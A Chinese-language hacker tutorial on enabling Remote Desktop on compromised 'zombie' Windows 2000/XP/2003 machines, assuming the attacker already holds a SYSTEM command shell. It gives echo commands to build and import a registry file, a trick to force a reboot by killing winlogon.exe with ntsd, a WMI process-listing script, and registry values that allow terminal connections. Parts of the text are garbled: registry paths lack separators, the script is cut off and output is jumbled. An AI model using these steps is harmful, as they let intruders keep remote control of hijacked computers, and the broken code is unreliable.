黑客必学――开启肉鸡终端全攻略

今天介绍的这种开终端的方法，绿色，环保，无污染~~

不须上传任何文件开启终端的方法适合win2k,xp,2003.

本文前提是已经通过某种方法得到了对方的一个SYSTEM权限的CMDSHELL~~

在无须传任何文件的情况下开启终端服务。

一、win 2k下终端开启终端

首先用ECHO写一个3389.reg文件,然后导入到注册表，echo代码如下：

echo Windows Registry Editor Version 5.00 >>3389.reg

echo [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersion

一个简单的办法就是用ntsd.exe(win 2k以上自带的命令)结束一个重要的进程就可以实现机器重启了！！

比如结束winlogon.exe,lsass.exe也可以但结束后会跳出重启倒计时(不太好~)

winlogon.exe被关闭后机器立刻强制重启了

命令执行格式为ntsd -c q -p PID

那如何知道winlogon.exe的PID进程号呢~

以下这个脚本可以列举当前所有进程的PID：

wscript.echo "PID

ProcessName"

for each ps in getobject("winmgmts:.

1704

regedit.exe

316

cscript.exe

从上面可以看出当前winlogon.exe的PID号为200运行命令ntsd -c q -p 200 (这里的200要替换为winlogon.exe进程对就的PID啦)过会儿机器马

上重启了(ntsd.exe是WIN自带的可用来结束任意级别进程)等着收获吧~~

二、winxp和win2003终端开启

开启的REG文件代码如下：

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]

"fDenyTSConnections"=dword:00000000

[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal ServerWds